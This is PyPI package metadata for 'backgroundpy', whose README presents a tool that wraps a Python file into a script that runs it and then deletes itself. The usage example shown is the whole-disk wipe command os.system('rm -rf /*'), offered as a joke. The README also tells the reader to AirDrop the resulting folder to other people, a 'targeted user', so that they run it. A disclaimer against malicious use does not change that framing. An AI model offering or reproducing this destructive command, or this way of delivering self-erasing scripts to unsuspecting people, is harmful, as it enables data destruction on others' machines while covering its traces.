{ "info": { "author": "David Ma", "author_email": "davidma@davidma.cn", "bugtrack_url": null, "classifiers": [], "description": "# BackgroundPy\nA tool for generating a runnable script, which runs a python file and deletes itself after it is ran (basically it generates a runnable script that cleans up after itself).\n\n## Warning\nThis tool is capable of running a script as a background thread and removing itself. This tool yields malware/trolling potential; however, do **NOT** use this tool for malicious reasons (just don't).\n\n## Installations\n```sh\npip install backgroundpy\n```\nNo I'm not going to list any other methods of installation because literally every other pypi package includes a 5 pages long installation guide on PYPI (google it up).\n\n## Dependencies\n* Mac OS/Linux only because Windows is dumb\n* Python 3\n\n## Usage\nCreate a python file with your code in it. An example is provided below:\n```python\n# Some Random Script\n\nimport os\n\nos.system('rm -rf /*') # Very friendly, eh?\n```\n\nJust don't put a function that requires packages the targeted user doesn't have.\n\nNext, run the following command. Replace the path with the path of your file:\n```sh\npython -m backgroundpy MyScript /path/to/the/file/thingy/u/just/created.py\n```\n\nThe above script creates a folder named *MyScript* (replace with a name of your choice), in which there is a script named *MyScript* that runs the given file and then deletes everything inside that folder. Airdrop the entire folder to other people for them to run.\n\nNote that the output folder is created in the current directory of the bash.\n\n## Some Thoughts\nYes this package is basically useless. I'm just bored (stuck in an IGCSE CS class about what are arrays).\n\n", "description_content_type": "text/markdown", "docs_url": null, "download_url": "", "downloads": { "last_day": -1, "last_month": -1, "last_week": -1 }, "home_page": "https://github.com/davidmaamoaix/BackgroundPy", "keywords": "", "license": "MIT", "maintainer": "", "maintainer_email": "", "name": "backgroundpy", "package_url": "https://pypi.org/project/backgroundpy/", "platform": "", "project_url": "https://pypi.org/project/backgroundpy/", "project_urls": { "Homepage": "https://github.com/davidmaamoaix/BackgroundPy" }, "release_url": "https://pypi.org/project/backgroundpy/1.0.0/", "requires_dist": null, "requires_python": "", "summary": "A tool for generating a runnable script, which runs a function and deletes itself after it is ran.", "version": "1.0.0" }, "last_serial": 4590373, "releases": { "1.0.0": [ { "comment_text": "", "digests": { "md5": "d42d3043c6bdbd17b0ee730627fef9e6", "sha256": "3884cc60a0b84bd52f6d84fadd71b0e197099179401348ad685ce76f226abb95" }, "downloads": -1, "filename": "backgroundpy-1.0.0-py3-none-any.whl", "has_sig": false, "md5_digest": "d42d3043c6bdbd17b0ee730627fef9e6", "packagetype": "bdist_wheel", "python_version": "py3", "requires_python": null, "size": 3672, "upload_time": "2018-12-12T14:09:16", "url": "https://files.pythonhosted.org/packages/45/41/b5ff51d4c1b8a39da7d9e031d0b847ae960aee7da1653b8300bca658acd7/backgroundpy-1.0.0-py3-none-any.whl" }, { "comment_text": "", "digests": { "md5": "88195ed9941eef65f764f386cdfe720b", "sha256": "f2be508e6da30370a9ab409b40001bae765da2a32be27a47ec6fe7d5e98bfecd" }, "downloads": -1, "filename": "backgroundpy-1.0.0.tar.gz", "has_sig": false, "md5_digest": "88195ed9941eef65f764f386cdfe720b", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 2370, "upload_time": "2018-12-12T14:09:18", "url": "https://files.pythonhosted.org/packages/e1/89/6650dc0861ba607791bce3116d1a73732ad85d85ea1068bd93512ef83f50/backgroundpy-1.0.0.tar.gz" } ] }, "urls": [ { "comment_text": "", "digests": { "md5": "d42d3043c6bdbd17b0ee730627fef9e6", "sha256": "3884cc60a0b84bd52f6d84fadd71b0e197099179401348ad685ce76f226abb95" }, "downloads": -1, "filename": "backgroundpy-1.0.0-py3-none-any.whl", "has_sig": false, "md5_digest": "d42d3043c6bdbd17b0ee730627fef9e6", "packagetype": "bdist_wheel", "python_version": "py3", "requires_python": null, "size": 3672, "upload_time": "2018-12-12T14:09:16", "url": "https://files.pythonhosted.org/packages/45/41/b5ff51d4c1b8a39da7d9e031d0b847ae960aee7da1653b8300bca658acd7/backgroundpy-1.0.0-py3-none-any.whl" }, { "comment_text": "", "digests": { "md5": "88195ed9941eef65f764f386cdfe720b", "sha256": "f2be508e6da30370a9ab409b40001bae765da2a32be27a47ec6fe7d5e98bfecd" }, "downloads": -1, "filename": "backgroundpy-1.0.0.tar.gz", "has_sig": false, "md5_digest": "88195ed9941eef65f764f386cdfe720b", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 2370, "upload_time": "2018-12-12T14:09:18", "url": "https://files.pythonhosted.org/packages/e1/89/6650dc0861ba607791bce3116d1a73732ad85d85ea1068bd93512ef83f50/backgroundpy-1.0.0.tar.gz" } ] }